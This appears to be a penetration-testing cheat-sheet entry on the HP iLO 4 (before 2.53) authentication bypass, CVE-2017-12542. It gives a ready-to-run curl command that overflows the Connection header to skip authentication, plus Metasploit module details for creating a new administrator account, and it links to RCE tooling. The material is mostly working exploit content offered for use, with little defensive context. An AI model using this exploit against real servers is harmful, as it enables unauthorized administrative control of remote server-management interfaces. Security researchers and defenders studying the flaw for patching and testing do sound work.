HP iLO 4 Authentication Bypass
HP iLO 4 (< 2.53) authentication bypass thanks to a buffer overflow.
Using the following header with any HTTP request should bypass the authentication:
curl -k -i -H "Connection: $(python -c 'print "A"*29')" https://<IP ADDRESS>/rest/v1/AccountService/Accounts
Apparently, you might also get an RCE from this vulnerability as stated in this article: https://github.com/airbus-seclab/ilo4_toolbox.
The following exploits uses this vulnerability to create a new admin user for the web interface.
msf > info auxiliary/admin/hp/hp_ilo_create_admin_account Name: HP iLO 4 1.00-2.50 Authentication Bypass Administrator Account Creation Module: auxiliary/admin/hp/hp_ilo_create_admin_account License: Metasploit Framework License (BSD) Rank: Normal Disclosed: 2017-08-24 Provided by: Fabien Perigaud <fabien.perigaud@synacktiv[dot]com> Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD ZVDlDjNTfFnY yes Password for the new account Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST yes The target address RPORT 443 yes The target port (TCP) SSL true no Negotiate SSL/TLS for outgoing connections USERNAME lCxA6rlF yes Username for the new account VHOST no HTTP server virtual host Description: This module exploits an authentication bypass in HP iLO 4 1.00 to 2.50, triggered by a buffer overflow in the Connection HTTP header handling by the web server. Exploiting this vulnerability gives full access to the REST API, allowing arbitrary accounts creation. References: https://cvedetails.com/cve/CVE-2017-12542/ http://www.securityfocus.com/bid/100467 https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us https://www.synacktiv.com/posts/exploit/hp-ilo-talk-at-recon-brx-2018.html